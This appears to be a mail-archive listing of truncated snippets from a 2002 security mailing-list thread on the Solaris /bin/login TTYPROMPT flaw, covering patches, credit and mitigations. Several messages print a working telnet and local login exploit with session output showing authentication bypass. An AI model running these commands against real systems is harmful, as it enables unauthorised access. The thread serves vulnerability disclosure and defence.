Hi.
On Wed, Oct 02, 2002 at 12:00:38PM -0400, buzheng wrote:
But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
Which is plain wrong. This may be
This is nothing more than a newly disclosed way of exploiting an old
bug, hardly newsworthy unless you're in the dot slash hacking business. In
the spirit of giving credit where credit is due, I'd like to note that the
bug was originally found by duke (ISS/ADM) of course. This method of
On Wed, 02 Oct 2002, you wrote:
But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
I have heard several conflicting reports on this matter and there
Works like a champ on Solaris 2.6/Sparc:
-- begin --
~ $ telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In-Reply-To: [EMAIL PROTECTED]
This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c/n
tester:bin#
Patches to resolve
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple
Sorry but I can't reproduce this on a Solaris 7 machine.
sunlight.ccs% telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.7
login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
On Wed, 2 Oct 2002, buzheng wrote:
I do not think this is a new bug.
I completely agree.
But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
That's
Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.
Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]
-
I have not failed. I
Apparently, Dave Ahmad wrote:
%
% These may be fixes for this vulnerablity, however they apply to telnetd
% and this vulnerability has to be in login.
So it makes more sense to apply the right patches to login, and not
patches to telnetd. If you only want to install the necessary patches
to
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple exploit, which does not require any code to be
compiled by an
I have confirmed this on a fresh Solaris 8/sparc install.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
Last login: Wed Oct 2
I do not think this is a new bug.
Actually, the overflow is not at changing the ttyprompt remotely.
in fact, if you just use a, instead of abcdef, as TTYPROMPT, it will
still work.
the overflow is that long user name with multiple space, all the c
will be taken as environment. it is the very
On Wed, 2 Oct 2002, Dave Ahmad wrote:
I suggest that everyone here who still uses telnet disable it immediately.
. . or install the latest Recomended patch cluster, which you should have
done anyway.
These may be fixes for this vulnerablity, however they apply to telnetd
and this
this findings origin, i think credits must be given due... i'll be waiting for a
clerification form Mr. Stuart.
thanks,
sinan
-Original Message-
From: Jonathan S [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, October 02, 2002 9:13 AM
To: [EMAIL PROTECTED]
Subject: Solaris 2.6, 7, 8
Hello
15 matches
Mail list logo